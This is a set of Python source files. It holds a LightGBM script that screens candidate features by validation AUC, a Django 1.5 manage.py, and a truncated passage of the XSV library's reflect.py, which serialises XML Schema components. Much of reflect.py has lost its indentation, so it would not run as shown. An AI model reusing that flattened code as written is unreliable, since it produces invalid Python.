print('number of columns:', len(df.columns))
num_boost_round = 5
early_stopping_rounds = 50
verbose_eval = 10
boosting = 'gbdt'
learning_rate = 0.02
num_leaves = 511
max_depth = -1
max_bin = 255
lambda_l1 = 0.2
lambda_l2 = 0
bagging_fraction = 0.9
bagging_freq = 2
bagging_seed = 2
feature_fraction = 0.9
feature_fraction_seed = 2
params = {
'boosting': boosting,
'learning_rate': learning_rate,
'num_leaves': num_leaves,
'max_depth': max_depth,
'lambda_l1': lambda_l1,
'lambda_l2': lambda_l2,
'max_bin': max_bin,
'bagging_fraction': bagging_fraction,
'bagging_freq': bagging_freq,
'bagging_seed': bagging_seed,
'feature_fraction': feature_fraction,
'feature_fraction_seed': feature_fraction_seed,
}
# on = [
# 'msno',
# 'song_id',
# 'target',
# 'source_system_tab',
# 'source_screen_name',
# 'source_type',
# 'language',
# 'artist_name',
# 'song_count',
# 'member_count',
# 'song_year',
# ]
# df = df[on]
fixed = [
'target',
'msno',
'song_id',
'source_system_tab',
'source_screen_name',
'source_type',
'artist_name',
# 'composer',
# 'lyricist',
'song_year',
# 'language',
# 'top3_in_song',
# 'rc',
'ITC_song_id_log10_1',
'ITC_msno_log10_1',
# 'ITC_source_system_tab_log10_1',
# 'ITC_source_screen_name_log10_1',
# 'ITC_source_type_log10_1',
# 'ITC_artist_name_log10_1',
# 'FAKE_1512883008',
]
result = {}
for w in df.columns:
    print("'{}',".format(w))
work_on = [
'top3_in_song',
# 'ITC_composer_log10_1',
# 'ITC_lyricist_log10_1',
# 'ITC_language_log10_1',
# 'ITC_song_year_log10_1',
# 'ITC_song_country_log10_1',
# 'ITC_rc_log10_1',
]
for w in work_on:
    if w in fixed:
        pass
    else:
        print('working on:', w)
        toto = [i for i in fixed]
        toto.append(w)
        df_on = df[toto]

        for col in df_on.columns:
            if df_on[col].dtype == object:
                df_on[col] = df_on[col].astype('category')

        print()
        print('Our guest selection:')
        print(df_on.dtypes)
        print('number of columns:', len(df_on.columns))
        print()

        # save_me = True
        save_me = False
        if save_me:
            print(' SAVE ' * 5)
            print(' SAVE ' * 5)
            print(' SAVE ' * 5)
            print('creating train set.')
            save_name = 'train'
            vers = '_me2'
            d = df_on.dtypes.to_dict()
            # print(d)
            print('dtypes of df:')
            print('>' * 20)
            print(df_on.dtypes)
            print('number of columns:', len(df_on.columns))
            print('number of data:', len(df_on))
            print('<' * 20)
            df_on.to_csv(save_dir + save_name + vers + '.csv', index=False)
            pickle.dump(d, open(save_dir + save_name + vers + '_dict.save', "wb"))
            print('done.')

        length = len(df_on)
        train_size = 0.76
        train_set = df_on.head(int(length*train_size))
        val_set = df_on.drop(train_set.index)
        del df_on

        train_set = train_set.sample(frac=1)
        X_tr = train_set.drop(['target'], axis=1)
        Y_tr = train_set['target'].values
        X_val = val_set.drop(['target'], axis=1)
        Y_val = val_set['target'].values
        del train_set, val_set

        t = len(Y_tr)
        t1 = sum(Y_tr)
        t0 = t - t1
        print('train size:', t, 'number of 1:', t1, 'number of 0:', t0)
        print('train: 1 in all:', t1/t, '0 in all:', t0/t, '1/0:', t1/t0)
        t = len(Y_val)
        t1 = sum(Y_val)
        t0 = t - t1
        print('val size:', t, 'number of 1:', t1, 'number of 0:', t0)
        print('val: 1 in all:', t1/t, '0 in all:', t0/t, '1/0:', t1/t0)
        print()
        print()

        train_set = lgb.Dataset(
            X_tr, Y_tr,
            # weight=[0.1, 1]
        )
        # train_set.max_bin = max_bin
        val_set = lgb.Dataset(
            X_val, Y_val,
            # weight=[0.1, 1]
        )
        train_set.max_bin = max_bin
        val_set.max_bin = max_bin
        del X_tr, Y_tr, X_val, Y_val

        params['metric'] = 'auc'
        params['verbose'] = -1
        params['objective'] = 'binary'

        print('Training...')
        model = lgb.train(params,
                          train_set,
                          num_boost_round=num_boost_round,
                          early_stopping_rounds=early_stopping_rounds,
                          valid_sets=[train_set, val_set],
                          verbose_eval=verbose_eval,
                          )
        print('best score:', model.best_score['valid_1']['auc'])
        print('best iteration:', model.best_iteration)
        del train_set, val_set
        print('complete on:', w)
        result[w] = model.best_score['valid_1']['auc']
        print()

print(model.feature_name())
print(model.feature_importance())

import operator
sorted_x = sorted(result.items(), key=operator.itemgetter(1))
# reversed(sorted_x)
# print(sorted_x)
for i in sorted_x:
    name = i[0] + ': '
    name = name.rjust(40)
    name = name + str(i[1])
    print(name)
print()

time_elapsed = time.time() - since
print('[timer]: complete in {:.0f}m {:.0f}s'.format(
    time_elapsed // 60, time_elapsed % 60))
'''1,2, artist name'''
authors: ["geemguang@gmail.com"] | author_id: geemguang@gmail.com
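
The core of this script is greedy feature screening: hold a fixed feature set, add one candidate feature at a time, train a LightGBM model, and rank candidates by validation AUC. A self-contained sketch of that loop on synthetic data (hyperparameters are placeholders, not the script's tuned values):

```python
# Sketch of one-feature-at-a-time screening with LightGBM on synthetic data.
import numpy as np
import lightgbm as lgb
from sklearn.metrics import roc_auc_score

rng = np.random.default_rng(0)
n = 2000
X = rng.normal(size=(n, 4))            # col 0 is "fixed", cols 1-3 are candidates
y = (X[:, 0] + 2 * X[:, 2] + rng.normal(size=n) > 0).astype(int)

fixed, candidates = [0], [1, 2, 3]
tr = slice(0, int(n * 0.76))           # same 0.76 head/tail split as above
va = slice(int(n * 0.76), n)

result = {}
for cand in candidates:
    cols = fixed + [cand]
    train = lgb.Dataset(X[tr][:, cols], y[tr])
    booster = lgb.train({'objective': 'binary', 'verbose': -1}, train,
                        num_boost_round=50)
    result[cand] = roc_auc_score(y[va], booster.predict(X[va][:, cols]))

for cand, auc in sorted(result.items(), key=lambda kv: kv[1]):
    print(f'feature {cand}: AUC={auc:.3f}')   # feature 2 should rank highest
```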

blob_id: 1bb914908b9a0071556fbc47a8343135d70438a3 | directory_id: da7d1008d925872317bcbe8b5f1e4f00a79d0936
path: /cloudywatch/manage.py | content_id: d1e93db31df166038f0669f71b3b47f7bbf152c7
detected_licenses: [] | license_type: no_license
repo_name: gregdingle/cloudywatch | branch_name: refs/heads/master
snapshot_id: b08b32ca50bb958bc30796c4d1482755c46978b2 | revision_id: 009651f6302f7bb12b5cd46bcb7161b278d7dfbb
visit_date: 2021-01-01T15:35:53.760805 | revision_date: 2013-11-20T12:28:21 | committer_date: 2013-11-20T12:28:21
github_id: null | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 630 | extension: py
content:
#!/usr/bin/env python
from django.core.management import execute_manager

try:
    import settings  # Assumed to be in the same directory.
except ImportError:
    import sys
    sys.stderr.write("Error: Can't find the file 'settings.py' in the directory containing %r. It appears you've customized things.\nYou'll have to run django-admin.py, passing it your settings module.\n(If the file settings.py does indeed exist, it's causing an ImportError somehow.)\n" % __file__)
    sys.exit(1)

# execute_manager requires exactly Django 1.5: it was removed in 1.6
import django
assert django.VERSION[0:2] == (1, 5)

if __name__ == "__main__":
    execute_manager(settings)
authors: ["ppr.vitaly@gmail.com"] | author_id: ppr.vitaly@gmail.com
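
`execute_manager` only exists up to Django 1.5, which is what the version assert above pins. For context, the post-1.5 equivalent of this file looks like the following sketch:

```python
# Post-1.6 Django manage.py equivalent: set the settings module and
# dispatch to execute_from_command_line instead of execute_manager.
import os
import sys

if __name__ == "__main__":
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "settings")
    from django.core.management import execute_from_command_line
    execute_from_command_line(sys.argv)
```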

blob_id: f3321310fe951e0106df38b5b260515ed0fdf383 | directory_id: 266ffd65306f964c2c7cd50d9e8c3c409eee73ee
path: /thedeployer/libs/XSV/infoset/indNorm/reflect.py | content_id: 0ddd0388bee28b0036fa760db358a26bd7a2bdef
detected_licenses: [] | license_type: no_license
repo_name: vimov/Deployer | branch_name: refs/heads/master
snapshot_id: 3d543dd5c53c675217f0e3c7fc7034c86bffae75 | revision_id: dbcdde0d83ee49a2812d4f65bb13ff78ce865da9
visit_date: 2021-01-25T04:52:49.317670 | revision_date: 2012-09-17T15:24:37 | committer_date: 2012-09-17T15:24:37
github_id: null | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 33,296 | extension: py
content:
"""Individual normal form: Reflect instances as XML doc in INF"""
__version__="$Revision: 1.10 $"
# $Id: reflect.py,v 1.10 2005-08-10 20:32:08 ht Exp $
import types
from XSV.infoset import PSVInfoset
from XSV.infoset import XMLInfoset
from XSV.compile.List import List
from XSV.compile.Union import Union
from XSV.compile.ComplexType import ComplexType
from XSV.compile.Group import Group, ModelGroup
from XSV.compile.Particle import Particle
from XSV.compile.Wildcard import Wildcard
from XSV.compile.Element import Element
from XSV.compile.AttributeUse import AttributeUse
from XSV.compile.Attribute import Attribute
from XSV.compile.AttributeGroup import AttributeGroup
from XSV.compile.Annotation import Annotation
from XSV.compile.KCons import Kcons, Key, Keyref, Unique
from XSV.compile.AnyAttribute import AnyAttribute
from XSV.compile.AbInitio import AbInitio
from XSV.compile.DDummy import DumpedSchema, namespaceSchemaInformation
from XSV.compile.DDummy import contentType, namespaceConstraint, valueConstraint
from XSV.compile.DDummy import xpathTemp, schemaDocument
from XSV.compile.Facet import Facet
from XSV.compile.ListFacet import Pattern
from XSV.compile.Component import Component
from XSV.compile.AbInitio import AbInitio
from XSV.compile.SimpleType import SimpleType
from XSV.compile.Type import Type
from XSV.compile import XMLSchemaNS, simpleTypeMap, builtinPats
from XSV.compile.SchemaError import shouldnt
def setup():
List.reflectedName='list'
List.reflectionInMap=(('name','string',1,'name'),
('targetNamespace','string',1,'targetNamespace'),
(('atomic','list'),'component',0,'basetype'),
('lvariety','aspecial',0,'varietyReflect'),
(('facet','enumeration','fractionDigits', 'minFractionDigits',
'precision', 'lexicalMappings','minInclusive',
'pattern','whiteSpace'),
'esspecial',0,'facetsReflect'),
('final','list',0,'final'),
(('atomic','list','union'),'component',1,'itemType'),
(('annotation',),'components',0,'annotations') # not per REC,
# but correct
)
List.reflectionOutMap=List.reflectionInMap
Union.reflectedName='union'
Union.reflectionInMap=(('name','string',1,'name'),
('targetNamespace','string',1,'targetNamespace'),
(('atomic','union'),'component',0,'basetype'),
('uvariety','aspecial',0,'varietyReflect'),
(('facet','enumeration','fractionDigits', 'minFractionDigits',
'precision', 'lexicalMappings','minInclusive',
'pattern','whiteSpace'),
'esspecial',0,'facetsReflect'),
('final','list',0,'final'),
(('atomic','list'),'components',1,'memberTypes'),
(('annotation',),'components',0,'annotations') # not per REC,
# but correct
)
Union.reflectionOutMap=Union.reflectionInMap
ComplexType.reflectedName='complexTypeDefinition'
ComplexType.reflectionInMap=(('name','string',1,'name'),
('targetNamespace','string',1,'targetNamespace'),
(('complexTypeDefinition','atomic','union','list'),
'component',1,'basetype'),
('derivationMethod','string',1,'derivationMethod'),
('final','list',0,'final'),
('abstract','boolean',0,'abstract'),
(('attributeUse',),'esspecial',1,'attributesReflect'),
(('attributeWildcard','wildcard'),
'especial',1,'attributeWildcardReflect'),
(('contentType',),'especial',0,'contentTypeReflect'),
('prohibitedSubstitutions','list',
0,'prohibitedSubstitutions'),
(('annotation',),'components',0,'annotations'))
ComplexType.reflectionOutMap=ComplexType.reflectionInMap
ModelGroup.reflectedName='modelGroupDefinition'
ModelGroup.reflectionInMap=(('name','string',0,'name'),
('targetNamespace','string',1,'targetNamespace'),
(('annotation',),'component',1,'annotation'),
(('modelGroup',),'especial',0,'mgReflect'))
ModelGroup.reflectionOutMap=ModelGroup.reflectionInMap
Group.reflectedName='modelGroup'
Group.reflectionInMap=(('compositor','string',0,'compositor'),
(('particle',),
'components',0,'particles'),
(('annotation',),'component',1,'annotation'))
Group.reflectionOutMap=Group.reflectionInMap
Particle.reflectedName='particle'
Particle.reflectionInMap=(('minOccurs','string',0,'minOccurs'),
('maxOccurs','string',0,'maxOccurs'),
('minOccurs','aspecial',0,'occursReflect'), # hack,
# for rebuild only
(('elementDeclaration','wildcard','modelGroup'),
'component',0,'term'))
Particle.reflectionOutMap=Particle.reflectionInMap
Wildcard.reflectedName='wildcard'
Wildcard.reflectionInMap=((('namespaceConstraint',),'especial',
0,'wildcardNamespaceReflect'),
('processContents','string',0,'processContents'),
(('annotation',),'component',1,'annotation'))
Wildcard.reflectionOutMap=Wildcard.reflectionInMap
Element.reflectedName='elementDeclaration'
Element.reflectionInMap=(('name','string',0,'name'),
('targetNamespace','string',1,'targetNamespace'),
(('complexTypeDefinition','atomic','union','list'),
'component',1,'typeDefinition'),
(('valueConstraint',),'especial',1,'vcReflect'),
('nillable','boolean',0,'nullable'),
('scope','aspecial',1,'scopeReflect'),
(('key','unique','keyref'),'esspecial',
0,'icsReflect'),
(('elementDeclaration',),
'component',1,'equivalenceClassAffiliation'),
('substitutionGroupExclusions','list',0,'final'),
('disallowedSubstitutions','list',
0,'prohibitedSubstitutions'),
('abstract','boolean',0,'abstract'),
(('annotation',),'component',1,'annotation'))
Element.reflectionOutMap=Element.reflectionInMap
AttributeUse.reflectedName='attributeUse'
AttributeUse.reflectionInMap=(('required','boolean',0,'minOccurs'),
(('attributeDeclaration',),'component',
0,'attributeDeclaration'),
(('valueConstraint',),'especial',1,'vcReflect'))
AttributeUse.reflectionOutMap=AttributeUse.reflectionInMap
Attribute.reflectedName='attributeDeclaration'
Attribute.reflectionInMap=(('name','string',0,'name'),
('targetNamespace','string',1,'targetNamespace'),
('scope','aspecial',1,'scopeReflect'),
(('atomic','list','union'),'component',1,'typeDefinition'),
(('valueConstraint',),'especial',1,'vcReflect'),
(('annotation',),'component',1,'annotation'))
Attribute.reflectionOutMap=Attribute.reflectionInMap
AttributeGroup.reflectedName='attributeGroupDefinition'
AttributeGroup.reflectionInMap=(('name','string',0,'name'),
('targetNamespace','string',1,'targetNamespace'),
(('attributeUse',),'esspecial',1,'attributesReflect'),
(('attributeWildcard','wildcard'),
'especial',1,'attributeWildcardReflect'),
(('annotation',),'component',1,'annotation'))
AttributeGroup.reflectionOutMap=AttributeGroup.reflectionInMap
Annotation.reflectedName='annotation'
Annotation.reflectionInMap=((('XML.Element',),'components',0,'appinfo'),
(('XML.Element',),'components',0,'documentation'),
(('XML.Attribute',),'components',0,'attrs'))
Annotation.reflectionOutMap=Annotation.reflectionInMap
Key.reflectedName=Key.cname
Keyref.reflectedName=Keyref.cname
Unique.reflectedName=Unique.cname
Kcons.reflectionInMap=(('name','string',0,'name'),
('targetNamespace','string',1,'targetNamespace'),
(('selector','xpath'),'especial',0,'selectorReflect'),
(('fields','xpath'),'especial',0,'fieldsReflect'),
(('key',),'component',1,'refer'),
(('annotation',),'component',1,'annotation'))
Kcons.reflectionOutMap=Kcons.reflectionInMap
AnyAttribute.reflectedName='wildcard'
AbInitio.reflectedName='atomic'
AbInitio.reflectionInMap=(('name','string',1,'name'),
('targetNamespace','string',1,'targetNamespace'),
(('atomic',),'component',0,'basetype'),
(('atomic',),'component',0,'primitiveType'),
(('facet','enumeration','fractionDigits', 'minFractionDigits',
'precision', 'lexicalMappings', 'minInclusive',
'pattern','whiteSpace'),
'esspecial',0,'facetsReflect'),
# XXX
(('fundamentalFacet',),'esspecial',0, 'fundamentalFacetsReflect'),
# XXX
('final','list',0,'final'),
(('annotation',),'components',0,'annotations') # not per REC,
# but correct
)
AbInitio.reflectionOutMap=AbInitio.reflectionInMap
DumpedSchema.reflectionInMap=((('namespaceSchemaInformation',),
'components',0,'schemaInformation'),)
DumpedSchema.reflectionOutMap=DumpedSchema.reflectionInMap
namespaceSchemaInformation.reflectionInMap=((('elementDeclaration', 'complexTypeDefinition',
'atomic','union','list','attributeDeclaration',
'modelGroupDefinition','attributeGroupDefinition',
'schemaDocument'),
'components',0,'components'),
('schemaNamespace','string',0,'schemaNamespace'))
namespaceSchemaInformation.reflectionOutMap=namespaceSchemaInformation.reflectionInMap
contentType.reflectionInMap=(('variety','string',1,'variety'),
(('atomic','union','list','particle'),'component',1,'model'))
contentType.reflectionOutMap=contentType.reflectionInMap
namespaceConstraint.reflectionInMap=(('variety','string',0,'variety'),
('namespaces','list',1,'namespaces'))
namespaceConstraint.reflectionOutMap=namespaceConstraint.reflectionInMap
valueConstraint.reflectionInMap=(('variety','string',0,'variety'),
('value','string',0,'value'))
valueConstraint.reflectionOutMap=valueConstraint.reflectionInMap
xpathTemp.reflectionInMap=(('path','string',0,'path'),)
xpathTemp.reflectionOutMap=xpathTemp.reflectionInMap
schemaDocument.reflectionInMap=(('documentLocation','string',0,'documentLocation'),)
schemaDocument.reflectionOutMap=schemaDocument.reflectionInMap
Facet.reflectionInMap=(('value','string',0,'value'),
('fixed','boolean',0,'fixed'))
Facet.reflectionOutMap=Facet.reflectionInMap[0:1]
simpleTypeMap.update({'list':List,
'union':Union,
'atomic':AbInitio})
InformationItem = XMLInfoset.InformationItem
Document = XMLInfoset.Document
Namespace = XMLInfoset.Namespace
xsiNamespace = XMLInfoset.xsiNamespace
infosetSchemaNamespace = XMLInfoset.infosetSchemaNamespace
psviSchemaNamespace = PSVInfoset.psviSchemaNamespace
def informationitemReflect(self, parent=None):
    XMLInfoset.Element(parent, infosetSchemaNamespace, "XXX")

InformationItem.reflect=informationitemReflect

def reflectString(self, parent, name, value, nullable, ns=None):
    if value is None:
        if not nullable:
            help()
    else:
        attr = XMLInfoset.Attribute(parent, ns, name, None, value)
        parent.addAttribute(attr)

InformationItem.reflectString=reflectString

def reflectNull(self, parent, name, ns=None):
    e = XMLInfoset.Element(parent, ns or infosetSchemaNamespace, name)
    parent.addChild(e)
    nullAttr = XMLInfoset.Attribute(e, xsiNamespace, "nil", None, "true")
    e.addAttribute(nullAttr)

InformationItem.reflectNull=reflectNull

def reflectBoolean(self, parent, name, value, nullable, ns=None):
    # sys.stderr.write("reflecting boolean %s, nullable=%s\n" % (value, nullable))
    if value != None:
        if value:
            value = "true"
        else:
            value = "false"
    self.reflectString(parent, name, value, nullable)

InformationItem.reflectBoolean=reflectBoolean
def documentReflect(self, parent=None, control=0):
doc = Document(None, None, "yes")
document = XMLInfoset.Element(doc, infosetSchemaNamespace, "document", None, None,
{None:Namespace(None, infosetSchemaNamespace),
"i":Namespace("i", xsiNamespace),
"xs":Namespace("xs",
"http://www.w3.org/2001/XMLSchema"),
"xml":Namespace("xml",
"http://www.w3.org/XML/1998/namespace")})
doc.addChild(document)
self.children[0].reflect(document)
for e in self.unparsedEntities:
e.reflect(document)
for n in self.notations:
n.reflect(document)
self.reflectString(document, "baseURI", self.baseURI, 1)
self.reflectString(document, "characterEncodingScheme", self.characterEncodingScheme, 1)
self.reflectString(document, "standalone", self.standalone, 1)
self.reflectString(document, "version", self.version, 1)
self.reflectBoolean(document, "allDeclarationsProcessed", self.allDeclarationsProcessed, 0)
return doc
Document.reflect=documentReflect
def elementReflect(self, parent,dumpChars=1):
element = XMLInfoset.Element(parent, infosetSchemaNamespace, "element")
parent.addChild(element)
self.reflectString(element, "namespaceName", self.namespaceName, 1)
self.reflectString(element, "localName", self.localName, 0)
self.reflectString(element, "prefix", self.prefix, 1)
for a in self.attributes.values():
a.reflect(element)
if self.namespaceAttributes:
for a in self.namespaceAttributes.values():
a.reflect(element)
for c in self.children:
if (not dumpChars) and isinstance(c,XMLInfoset.Characters):
pass
c.reflect(element)
if self.inScopeNamespaces:
for a in self.inScopeNamespaces.values():
a.reflect(element)
self.reflectString(element, "baseURI", self.baseURI, 1)
return element
XMLInfoset.Element.reflect=elementReflect
def charactersReflect(self, parent):
tt=XMLInfoset.Element(parent,infosetSchemaNamespace,"text")
parent.addChild(tt)
self.reflectString(tt,"content",self.characters,0)
XMLInfoset.Characters.reflect=charactersReflect
def attributeReflect(self, parent=None):
attribute = XMLInfoset.Element(parent, infosetSchemaNamespace, "attribute")
parent.addChild(attribute)
self.reflectString(attribute, "namespaceName", self.namespaceName, 1)
self.reflectString(attribute, "localName", self.localName, 0)
self.reflectString(attribute, "prefix", self.prefix, 1)
self.reflectString(attribute, "normalizedValue", self.normalizedValue, 1)
self.reflectBoolean(attribute, "specified", self.specified, 0)
self.reflectString(attribute, "attributeType", self.attributeType, 1)
self.reflectString(attribute, "references", None, 1) # not implemented
return attribute
XMLInfoset.Attribute.reflect=attributeReflect
def namespaceReflect(self, parent=None):
namespace = XMLInfoset.Element(parent, infosetSchemaNamespace, "namespace")
parent.addChild(namespace)
self.reflectString(namespace, "prefix", self.prefix, 1)
self.reflectString(namespace, "namespaceName",
self.namespaceName, 0)
Namespace.reflect=namespaceReflect
def nsiReflect(self, parent=None):
nsi = XMLInfoset.Element(parent, psviSchemaNamespace, "namespaceSchemaInformation")
parent.addChild(nsi)
self.reflectString(nsi, "schemaNamespace", self.schemaNamespace, 1)
for c in self.schemaComponents:
c.reflect(nsi,1)
for d in self.schemaDocuments:
d.reflect(nsi)
for a in self.schemaAnnotations:
a.reflect(nsi)
PSVInfoset.NamespaceSchemaInformation.reflect=nsiReflect
def sdReflect(self, parent=None):
sd = XMLInfoset.Element(parent, psviSchemaNamespace, "schemaDocument")
parent.addChild(sd)
self.reflectString(sd, "documentLocation", self.documentLocation, 1)
PSVInfoset.schemaDocument.reflect=sdReflect
def componentReflect(self,parent,forceFull=0,noID=0):
if self.uid and not forceFull:
# a pointer
self.reflectAsPointer(self.uid,parent)
else:
e = XMLInfoset.Element(parent, psviSchemaNamespace, self.reflectedName)
parent.addChild(e)
if self.needsId and not forceFull:
self.assignUid()
if self.uid and not noID:
idAttr = XMLInfoset.Attribute(e, None, "id", None, self.uid)
e.addAttribute(idAttr)
for rme in self.reflectionOutMap:
# reflectionMap entries: (compPropertyName,valueType,nullable,
# pythonPropertyName)
# print ('rme',rme)
value=getattr(self,rme[3])
# print ('vv',self,value)
if rme[1]=='string':
e.reflectString(e,rme[0],value,
rme[2])
elif rme[1]=='list':
if len(value)>0:
e.reflectString(e,rme[0],' '.join(value),rme[2])
elif rme[1]=='boolean':
if str(value) not in ('true','false'):
if value:
value='true'
else:
value='false'
e.reflectString(e,rme[0],value,
rme[2])
elif rme[1]=='component':
if value is not None:
value.reflect(e)
elif rme[2]:
pass
elif rme[1] in ('aspecial','especial','esspecial'):
value(e)
elif rme[1]=='components':
if value is None and rme[2]:
continue
for vv in value or []:
vv.reflect(e)
def reflectAsPtr(self,ref,parent,eltName,eltns=psviSchemaNamespace):
c = XMLInfoset.Element(parent, eltns, eltName)
parent.addChild(c)
refAttr = XMLInfoset.Attribute(c, None, "ref", None, ref)
c.addAttribute(refAttr)
nilAttr = XMLInfoset.Attribute(c, xsiNamespace, "nil", None, "true")
c.addAttribute(nilAttr)
if self.alwaysNamed:
nAttr = XMLInfoset.Attribute(c, None, "name", None, self.name)
c.addAttribute(nAttr)
if self.targetNamespace is not None:
nsAttr = XMLInfoset.Attribute(c, None, "tns", None, self.targetNamespace)
c.addAttribute(nsAttr)
def reflectAIAsPointer(self,ref,parent):
return reflectAsPtr(self,ref,parent,"atomic")
def reflectCompAsPointer(self, ref, parent=None):
return reflectAsPtr(self,ref,parent,self.reflectedName)
Component.reflectAsPointer=reflectCompAsPointer
AbInitio.reflectAsPointer=reflectAIAsPointer
Component.reflect=componentReflect
Component.needsId=0
Component.alwaysNamed=0
AbInitio.alwaysNamed=0
ComplexType.needsId=1 # only nested Elts, Attrs, CTs and STs need Ids
SimpleType.needsId=1
Element.needsId=1
Attribute.needsId=1
Pattern.needsId=1 # because they have big patterns
Pattern.uids=None
Attribute.alwaysNamed=1 # Because typelocal-table is built right away
Kcons.needsId=1
def modelReflect(self,parent,forceFull=0,noID=0):
tick=0
if self.name:
if (not forceFull) and self.id:
# forward reference to model group defn
self.reflectedName='modelGroup'
tick=1
else:
self.reflectionOutMap=ModelGroup.reflectionOutMap
Component.reflect(self,parent,forceFull,noID)
if tick:
self.reflectedName='modelGroupDefinition'
Group.reflect=modelReflect
allPrefixes={'xsd':XMLSchemaNS,
'xsi':xsiNamespace}
allNSs={xsiNamespace:'xsi',
XMLSchemaNS:'xsd'}
def assignUid(self):
cnn=None
nn=self.name
if self.targetNamespace:
if allNSs.has_key(self.targetNamespace):
cnn="%s.."%allNSs[self.targetNamespace]
elif (self.xrpr and self.xrpr.elt and self.xrpr.elt.namespaceDict):
for (n,v) in self.xrpr.elt.namespaceDict.items():
# note that this namespaceDict is a Mapper hack from layer.py
if v==self.targetNamespace:
if n!=None and (not allPrefixes.has_key(n)):
allNSs[self.targetNamespace]=n
allPrefixes[n]=self.targetNamespace
cnn="%s.."%n
break
if cnn:
if ((isinstance(self,Element) or
isinstance(self,Attribute)) and self.scope!='global'):
# avoid spurious conflicts
nn="%s.%s"%(nn,self.id)
else:
n="x%d"%self.id
allNSs[self.targetNamespace]=n
allPrefixes[n]=self.targetNamespace
cnn="%s.."%n
else:
cnn=""
if nn:
nn="%s.%s"%(nn,self.id)
self.uid="%s%s.%s"%(cnn,self.kind,nn or "_anon_%s"%self.id)
Component.uid=None
Component.assignUid=assignUid
Type.kind='type'
Element.kind='elt'
Attribute.kind='attr'
Group.kind='mg'
AttributeGroup.kind='ag'
Kcons.kind='idCons'
Facet.kind='f'
Pattern.reflectedName='pattern'
# Notation.kind='ntn'
def abInitioReflect(self,parent,force=0):
if force:
e = XMLInfoset.Element(parent, psviSchemaNamespace, 'atomic')
parent.addChild(e)
idAttr = XMLInfoset.Attribute(e, None, "id", None, self.uid)
e.addAttribute(idAttr)
nullAttr = XMLInfoset.Attribute(e, xsiNamespace, "nil", None, "true")
e.addAttribute(nullAttr)
else:
# a pointer
self.reflectAsPointer(self.uid,parent)
AbInitio.reflect=abInitioReflect
def aiAssign(self):
self.uid=self.name
AbInitio.assignUid=aiAssign
AbInitio.uid=None
def scopeReflect(self,parent):
    if self.scope is not None:
        if self.scope=='global':
            parent.reflectString(parent,'scope','global',0)
        else:
            parent.reflectString(parent,'scope','local',0)

Element.scopeReflect=scopeReflect
Attribute.scopeReflect=scopeReflect

def vcReflect(self,parent):
    if self.valueConstraint is not None:
        vc=XMLInfoset.Element(parent,psviSchemaNamespace,'valueConstraint')
        parent.addChild(vc)
        vc.reflectString(vc,'variety',self.valueConstraint[0],1)
        vc.reflectString(vc,'value',self.valueConstraint[1],0)

Element.vcReflect=vcReflect
Attribute.vcReflect=vcReflect
AttributeUse.vcReflect=vcReflect
def icsReflect(self,parent):
for kd in self.keys:
kd.reflect(parent)
for ud in self.uniques:
ud.reflect(parent)
for krd in self.keyrefs:
krd.reflect(parent)
Element.icsReflect=icsReflect
def adReflect(self,parent):
tab={}
for ad in self.attributeDeclarations:
ad.expand(tab)
for vv in tab.values():
vv.reflect(parent)
AttributeGroup.adReflect=adReflect
def mgReflect(self,parent):
self.reflectionOutMap=Group.reflectionOutMap
self.reflectedName='modelGroup'
name=self.name # stop recursion
self.name=None
self.reflect(parent,1,1)
self.name=name
Group.mgReflect=mgReflect
def wnsReflect(self,parent):
ns=XMLInfoset.Element(parent,psviSchemaNamespace,'namespaceConstraint')
parent.addChild(ns)
if self.allowed=='##any':
ns.reflectString(ns, 'variety', 'any', 0)
else:
if self.negated:
ns.reflectString(ns, 'variety', 'negative', 0)
else:
ns.reflectString(ns, 'variety', 'positive', 0)
if len(self.namespaces)>0:
ns.reflectString(ns,'namespaces',' '.join(map(lambda n:n or '##none',
self.namespaces)),0)
Wildcard.wildcardNamespaceReflect=wnsReflect
def ctReflect(self,parent):
if self.contentType is not None:
ct=XMLInfoset.Element(parent,psviSchemaNamespace,'contentType')
parent.addChild(ct)
if self.contentType=='empty':
ct.reflectString(ct, 'variety','empty',0)
elif self.contentType in ('elementOnly','mixed'):
ct.reflectString(ct, 'variety',self.contentType,0)
self.model.reflect(ct)
else:
ct.reflectString(ct, 'variety','simple',0)
self.model.reflect(ct)
ComplexType.contentTypeReflect=ctReflect
def attrsReflect(self,parent):
for au in self.attributeDeclarations.values():
if isinstance(au.attributeDeclaration,Attribute):
au.reflect(parent)
ComplexType.attributesReflect=attrsReflect
def agAttrsReflect(self,parent):
for au in self.attributeDeclarations:
if isinstance(au.attributeDeclaration,Attribute):
au.reflect(parent)
AttributeGroup.attributesReflect=agAttrsReflect
def awReflect(self,parent):
# wc=None
# for ad in self.attributeDeclarations.values():
# if isinstance(ad.attributeDeclaration,Wildcard):
# wc=ad.attributeDeclaration
# break
if self.attributeDeclarations.has_key('#any'):
self.attributeDeclarations['#any'].attributeDeclaration.reflect(parent)
ComplexType.attributeWildcardReflect=awReflect
def agAwReflect(self,parent):
for au in self.attributeDeclarations:
if isinstance(au.attributeDeclaration,Wildcard):
au.attributeDeclaration.reflect(parent)
return
AttributeGroup.attributeWildcardReflect=agAwReflect
def selReflect(self,parent):
selp=XMLInfoset.Element(parent,psviSchemaNamespace,'xpath')
parent.addChild(selp)
selp.reflectString(selp, 'path',self.selector.str,0)
Kcons.selectorReflect=selReflect
def referReflect(self,parent):
self.reflectAsPointer(self.refer, parent, 'referencedKey')
Kcons.referReflect=referReflect
def fsReflect(self,parent):
for f in self.fields:
xp=XMLInfoset.Element(parent,psviSchemaNamespace,'xpath')
parent.addChild(xp)
xp.reflectString(xp, 'path',f.str,0)
Kcons.fieldsReflect=fsReflect
def ptReflect(self,parent):
if self.primitiveType is not None:
self.primitiveType.reflectAsPointer(self.primitiveType.name,parent)
SimpleType.primitiveTypeReflect=ptReflect
def facetsReflect(self,parent):
if self.variety=='atomic':
auth=self.primitiveType
elif self.variety=='list':
auth=List
elif self.variety=='union':
auth=Union
else:
shouldnt('bogusv: %s'%self.variety)
for fn in auth.allowedFacets:
if self.facets.has_key(fn):
facet=self.facets[fn]
else:
facet=None
if (facet is not None and facet.value is not None):
fval=facet.value
if type(fval)==types.ListType:
if fn=='pattern': # hack to save megaspace
if facet.uids is not None:
